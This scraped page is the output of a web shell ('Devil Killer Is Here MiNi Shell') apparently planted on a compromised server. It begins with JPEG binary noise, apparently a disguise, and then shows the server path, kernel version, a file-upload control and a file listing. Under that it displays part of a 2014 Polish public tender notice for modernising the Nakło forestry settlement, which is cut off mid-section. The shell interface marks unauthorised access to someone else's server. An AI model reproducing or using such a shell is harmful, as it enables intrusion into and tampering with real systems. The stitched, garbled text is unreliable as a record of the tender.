JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140718/156747-N-2014.html

<p class="kh_header"><b>Szubin: Modernizacja osady Leśnictwa Nakło</b><br>
<b>Numer ogłoszenia: 156747 - 2014; data zamieszczenia: 18.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Szubin , ul. Szubin Wieś 52, 89-200 Szubin, woj. kujawsko-pomorskie, tel. 052 3910310, 3910324, faks 052 3910337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://szubin.torun.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja osady Leśnictwa Nakło.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.	Przedmiotem zamówienia jest wykonanie robót budowlanych wraz z objęciem funkcji kierownika budowy polegających  na  modernizacji osady Leśnictwa Nakło położonej w miejscowości Studzienki 22, 89-240 Kcynia, działka ew. 3065/6 obr. ew. Studzienki, gmina Kcynia. Zakres zadania obejmuje rozbudowę i remont budynku mieszkalnego - leśniczówki, rozbiórkę czterech budynków gospodarczych, budowę budynku gospodarczo-garażowego z wiatą, wykonanie robót związanych z zagospodarowaniem terenu, m.in. utwardzenie terenu kostką brukową, wykonanie ogrodzenia. Ogólny zakres robót obejmuje:
I.	Rozbudowa i remont budynku mieszkalnego: istniejący budynek mieszkalny murowany z cegły na fundamentach z kamienia, parterowy z poddaszem użytkowym, podpiwniczony, kryty blachodachówką,  powierzchnia użytkowa 157,10m2, pow. zabudowy 124,57m2. Projektuje się rozbudowę o część jednokondygnacyjną niepodpiwniczoną, ze stropodachem, dach dwuspadowy, kryty blachodachówką, połączoną ze ścianą szczytową istniejącego budynku. W ramach robót poprzedzających budowę należy wykonać rozbiórkę altany drewnianej, demontaż nieczynnych zbiorników bezodpływowych, rozbiórkę fragmentu ogrodzenia oraz odcinka chodnika z kostki betonowej. Powierzchnia użytkowa części rozbudowanej będzie wynosiła 32,55m2, w tym:
-	wiatrołap - 5,94m2,
-	pomieszczenie w.c. - 3,75m2,
-	pomieszczenie gospodarcze  - 4,86m2,
-	pokój (kancelaria) - 18,00 m2.

  Powierzchnia zabudowy części rozbudowanej 40,60m2, kubatura 148,40m3.    

Ogólny opis projektowanej rozbudowy budynku:
Fundamenty budynku stanowią ławy żelbetowe szerokości 50 i 25cm. Ściany fundamentowe gr. 25cm wykonane z bloczków betonowych izolowane powłoką z mas bitumicznych. Ściany przyziemia z bloczków z betonu komórkowego gr. 24cm, ścianki działowe gr. 12cm. Nadproża żelbetowe z belek prefabrykowanych, wieniec żelbetowy monolityczny o wymiarach 25x24cm. Posadzka na gruncie wraz z izolacją termiczną ze styropianu oraz przeciwwilgociową z papy oraz folii. Wykończenie posadzek z płytek terakotowych oraz paneli podłogowych. Stolarka okienna z PCV, stolarka drzwiowa drewniana. Tynki wewnętrzne cementowo-wapienne oraz gładzie gipsowymi, malowane farbami emulsyjnymi. Więźba dachowa drewniana, pokrycie dachu z blachodachówki docieplone wełną mineralną. Obróbki blacharskie oraz orynnowanie z blachy ocynkowanej powlekanej. Ściany zewnętrzne docieplone styropianem, tynk zewnętrzny mineralny malowany farbami silikonowymi. Budynek wyposażony w instalację elektryczną, centralnego ogrzewania, wodno-kanalizacyjną wraz z przyborami sanitarnymi.     

Ogólny zakres prac remontowych budynku mieszkalnego - leśniczówki.
-	wykonaniu izolacji termicznej fundamentów budynku, 
-	wykonanie opaski betonowej wokół budynku,
-	wykonanie remontu  istniejącej elewacji polegającej na dociepleniu ścian zewnętrznych budynku styropianem o grubości 15 cm,
-	wykonanie tynku cienkowarstwowego 
-	wewnątrz budynku : demontaż paneli boazeryjnych z pcv, paneli podłogowych,
-	montaż nowych okładzin ściennych ( boazeryjnych)
-	montaż nowych paneli podłogowych
-	wymiana schodów drewnianych wewnętrznych z drewna liściastego twardego,
-	wymian okładzin ściennych w łazience na parterze wraz z białym montażem,
-	wymianie brodzika w łazience na poddaszu ,
-	wymiana trzech okien na poddaszu oraz wykonanie dodatkowego okna dachowego w łazience,
-	regulacja i uszczelnienie drzwi zewnętrznych wejściowych,
-	wymiana osprzętu instalacji elektrycznej - gniazdka wtykowe, włączniki

II.	Roboty rozbiórkowe:
-	rozbiórka budynku gospodarczego (garaże) nr inw. 102/802 o pow. zabudowy 50,87m2, pow. użytkowa 42,63m2, budynek murowany z cegły, kryty płytami azbestowo-cementowymi,
-	rozbiórka budynku gospodarczego nr inw. 108/352 o pow. zabudowy 86,40 m2, pow. użytkowa 69,27m2, budynek murowany z cegły, od wysokości poddasza ściany drewniane, pokrycie dachu z papy, 
-	rozbiórka budynku gospodarczego (stodoła) nr inw. 108/274 o pow. zabudowy 88,27m2, pow. użytkowa 70,60m2, budynek murowany z cegły, kryty dachówką  betonową,
-	rozbiórka budynku gospodarczego nr inw. 108/801 o pow. zabudowy 45,52m2, pow. użytkowa 35,17m2, murowany z cegły, kryty płytami azbestowo-cementowymi.

Przy demontażu wyrobów zawierających azbest wykonawca  jest zobowiązany do zachowania wszelkich przepisów prawa budowlanego, bhp oraz postępowania z wyrobami zawierającymi azbest, m.in.  rozporządzenia Ministra Gospodarki Pracy i Polityki Społecznej z 2 kwietnia 2004 w sprawie sposobów i warunków bezpiecznego użytkowania wyrobów zawierających azbest (Dz. U Nr 71 poz. 649). Podmiot gospodarczy świadczący usługi polegające na transporcie odpadów obowiązany jest posiadać stosowne zezwolenie na transport odpadów niebezpiecznych zawierających azbest, oraz decyzję zatwierdzająca program gospodarki odpadami. Wykonawca winien zapewnić deponowanie odpadów na legalnym składowisku uprawnionym do przyjęcia odpadów zawierających azbest. Udokumentowanie utylizacji nastąpi na podstawie karty przekazania odpadów na legalne składowisko uprawnione do przyjęcia odpadów zawierających azbest.
 

III.	Budowa budynku gospodarczo-garażowego z wiatą drewnianą.
Ogólny opis projektowanego budynku:
Projektuje się budowę budynku gospodarczo-garażowego z przylegającą do bocznej ściany z lewej strony wiatą drewnianą. Budynek parterowy, niepodpiwniczony, wykonany w technologii tradycyjnej z gazobetonu, ściany grubości 24 cm na ławach fundamentowych oraz ścianach fundamentowych z bloczków betonowych.  Nadproża żelbetowe z belek prefabrykowanych, wieniec żelbetowy monolityczny. Posadzka w budynku murowanym betonowa, pod wiatą z kostki betonowej. Tynki wewnętrzne cementowo-wapienne malowane farbami emulsyjnymi. Stolarka okienna z PCV, drzwi zewnętrzne aluminiowe, wewnętrzne stalowe. Bramy garażowe segmentowe uchylne z napędem elektrycznym. Tynki zewnętrzne cementowo-wapienne oraz mineralne cienkowarstwowe malowane farbami silikonowymi.  Dach dwuspadowy z prefabrykowanych konstrukcji drewnianych z suszonej, struganej, impregnowanej tarcicy o pochyleniu połaci dachowych 250  Pokrycie dachu z blachodachówki. Mocowanie wiązarów bezpośrednio do wieńca. Wiata na słupach drewnianych posadowiona na stopach betonowych z dachem dwuspadowym, kryta blachodachówką. Budynek wyposażony w instalację elektryczną.   
Budynek gospodarczo-garażowy składa się z garażu dwustanowiskowego, dwóch pomieszczeń gospodarczych oraz wiaty drewnianej. 
Powierzchnia użytkowa części murowanej budynku wynosi 78,60m2, powierzchnia zabudowy 91,20m2, powierzchnia użytkowa wiaty 21,50m2, powierzchnia zabudowy wiaty  24,42m2.

IV.	Zagospodarowanie terenu:
-	utwardzenie terenu kostką betonową - droga wewnętrzna, chodniki, opaski przy budynkach,
-	rozbiórka fragmentu ogrodzenia drewnianego,
-	montaż ogrodzenia z siatki stalowej, bramy wjazdowej oraz dwóch furtek.  

  
2.	Szczegółowy zakres i technologia robót określona jest w dokumentacji projektowej  i  specyfikacji technicznej wykonania i odbioru robót,  stanowiące załącznik do SIWZ. 
3.	Miejsce wykonywania robót: Studzienki 22, 89-240 Kcynia działka ewidencyjna nr 3065/6, obręb ewidencyjny Studzienki,  gmina Kcynia , Powiat Nakło nad Notecią,  Województwo Kujawsko-Pomorskie.  
4.	Roboty zostaną wykonane w oparciu o pozwolenie na budowę.
5.	Nazwy i kody dotyczące przedmiotu zamówienia określone  we Wspólnym Słowniku Zamówień: 
45210000-2 Roboty budowlane  w zakresie budynków,
45111300-1 Roboty rozbiórkowe

6.	Zamawiający dopuszcza możliwość zastosowania rozwiązań równoważnych projektowanym i opisywanym. Wszystkie materiały określone w dokumentacji projektowej pochodzące od konkretnych producentów określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały, aby spełniać wymagania stawiane przez Zamawiającego.   W przypadku powoływania się na rozwiązania  równoważne , Wykonawca zobowiązany jest wykazać, że spełniają one wymagania Zamawiającego. Wykonawca chcąc zaproponować w swojej ofercie inne w stosunku do określonych przez Zamawiającego, rozwiązanie równoważne, może je opisać w odpowiedniej pozycji swojego kosztorysu ofertowego, a do oferty należy dołączyć dokumenty potwierdzające, że oferowane rozwiązanie jest równoważne, umożliwiające Zamawiającemu porównanie cech technicznych, jakościowych i użytkowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.11.12.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Każda oferta musi być zabezpieczona wadium (zgodnie z art. 45 ust.4) o wartości: 10.000,00zł. (słownie : dziesięć   tysięcy  złotych).
2)	Wadium może być wniesione w jednej lub kilku następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej , z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5pkt. 2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r Nr 42, poz. 275 z późn. zm.)  
3)	Wadium w formie pieniężnej należy wnieść na rachunek bankowy zamawiającego: PKO BP o/Szubin  49 1020 1462 0000 7502 0157 0332. 
4)	Na poleceniu przelewu (blankiecie wpłaty) należy podać tytuł przelewu: Wadium - modernizacja osady Leśnictwa Nakło .  
5)	Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w kasie zamawiającego (w siedzibie zamawiającego). Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a  oraz art. 46 ust. 5  ustawy Prawo zamówień publicznych.
6)	Wadium musi być wniesione przed upływem  terminu składania ofert. tj. do dnia 06.08.2014r. do godz. 9.00.
7)	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym zamawiającego.
7)	Wadium wniesione w formie bezgotówkowej będzie skuteczne jeśli oryginał dokumentu gwarancji zostanie złożony w kasie Zamawiającego przed terminem złożenia ofert.
8)	Wykonawca,  który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
9)	Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów wykonawców (z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza) zamawiający przekaże do banku niezwłocznie po:
a)	wyborze najkorzystniejszej oferty,
b)	unieważnieniu postępowania o udzielenie  zamówienia publicznego,
10)	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy oraz wniesieniu zabezpieczenia należytego wykonania umowy. 
11)	Zamawiający niezwłocznie dokona zwrotu wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
12)	Wadium wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz z odsetkami w przypadku, gdy wykonawca: 
a)	odmówi podpisania umowy na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.
12)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie,
13)	Jeżeli wadium zostanie wniesione w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 
14)	Wadium powinno obejmować cały okres związania z ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób oceny spełnienia warunku: Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczegółowy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sposób oceny spełnienia warunku: warunek uznaje się za spełniony, jeżeli wykonawca przedstawi wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, obejmujący co najmniej dwie odrębne  roboty budowlane polegające   na budowie, rozbudowie lub przebudowie budynku   - na kwotę co najmniej  250.000,00 zł brutto każda.
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą  spełnia - nie spełnia , w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ. 
W przypadku przedstawienia w ofercie dokumentów sporządzonych w walucie innej niż złoty, Zamawiający dokona stosownego przeliczenia na złote podczas badania złożonych ofert - według tabeli średnich kursów walut obcych NBP z dnia publikacji ogłoszenia  o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób oceny spełnienia warunku: Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczegółowy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób oceny spełnienia warunku: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca, na podstawie informacji umieszczonych w wykazie wykaże, że dysponuje  co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi  w specjalności konstrukcyjno-budowlanej, wydane zgodnie z § 17 rozporządzenia Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28.04.2006r. (Dz. U.  Nr 83, poz. 578 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie przepisów obowiązujących w chwili uzyskania stosownych uprawnień oraz złoży oświadczenie, że osoba wskazana w wykazie jako kierownik budowy, posiada  uprawnienia nadane przez właściwe organy  do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej.
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą  spełnia - nie spełnia , w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sposób oceny spełnienia warunku: warunek uznaje się za spełniony po przedstawieniu informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej ,  potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę minimum 250.000,00 zł wystawioną nie wcześniej niż trzy miesiące przed upływem terminu składania ofert.  
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą  spełnia - nie spełnia , w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ. 
W przypadku przedstawienia w ofercie dokumentów sporządzonych w walucie innej niż złoty, Zamawiający dokona stosownego przeliczenia na złote podczas badania złożonych ofert - według tabeli średnich kursów walut obcych NBP z dnia publikacji ogłoszenia  o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
Zmiany, o których mowa powyżej mogą zostać dokonane, jeżeli ich uzasadnieniem są niżej wymienione okoliczności:

1 Zmiana terminu realizacji przedmiotu umowy może nastąpić w sytuacji:
a.	wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów itp.;
b.	konieczności wykonania robót, których wykonanie w sposób obiektywny uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;
c.	wstrzymania prac przez właściwe organy z przyczyn niezależnych od Wykonawcy;
d.	wystąpienia innych przyczyn zewnętrznych niezależnych od Wykonawcy i Zamawiającego skutkujących niemożliwością prowadzenia prac.
e.	konieczności wykonania  robót dodatkowych lub zamiennych,  nieobjętych zamówieniem podstawowym,  jeżeli czas ich realizacji lub zakres uniemożliwiają dotrzymanie  terminu zakończenia robót.
2 Zmiana zakresu robót będzie możliwa w sytuacji:
